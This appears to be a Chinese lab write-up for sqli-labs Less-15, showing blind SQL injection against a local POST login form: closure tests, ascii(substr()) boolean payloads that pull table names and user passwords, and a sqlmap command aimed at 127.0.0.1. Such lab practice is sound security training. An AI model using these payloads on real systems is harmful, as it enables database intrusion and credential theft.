Less-15
方法一:
Post传参,先用burp suite抓包
判断闭合方式:
uname=’ or 1=1 #&passwd=&submit=Submit 显示登录成功,闭合方式为’’
uname=’) or 1=1 #&passwd=&submit=Submit 添加符号后没有报错信息,直接返回登录失败,说明这题只有正确或者错误两种返回,可以使用布尔盲注进行注入。
Substr(a,b,c):从位置b开始截取a字符中的前c个字符
判断当前数据库名长度:
uname=’ or length(database())>0 #&passwd=&submit=Submit
判断数据库名:
先猜解第一个字母:
uname=’ or ascii(substr(database(),1,1))>100 #&passwd=&submit=Submit
第二个字母:
uname=’ or ascii(substr(database(),2,1))>100 #&passwd=&submit=Submit
猜解security库中的表名:
第一个表名的第一个字母:
uname=’ or ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1))>100 #&passwd=&submit=Submit
猜解users表中的字段:
第一个字段的第一个字母:
uname=’ or ascii(substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘users’ limit 0,1),1,1))>100 #&passwd=&submit=Submit
猜解username字段中信息:
第一个信息:
uname=’ or ascii(substr((select username from security.users limit 0,1),1,1))>10 #&passwd=&submit=Submit
猜解password字段中的信息:
uname=’ or ascii(substr((select password from security.users limit 0,1),1,1))>10 #&passwd=&submit=Submit
方法二:
使用sqlmap进行爆破:
使用burp suite抓包之后,得到post传参方法,利用sqlmap进行爆破:
使用命令:
sqlmap.py -u “http://127.0.0.1/sqli-labs-master/Less-15/” --data “uname=1&passwd=&submit=Submit” -f --banner –dbs
开始爆破:
得到banner信息:
得到数据库:
并且得到后台数据库的信息已经保存:
持续更新。。。。。。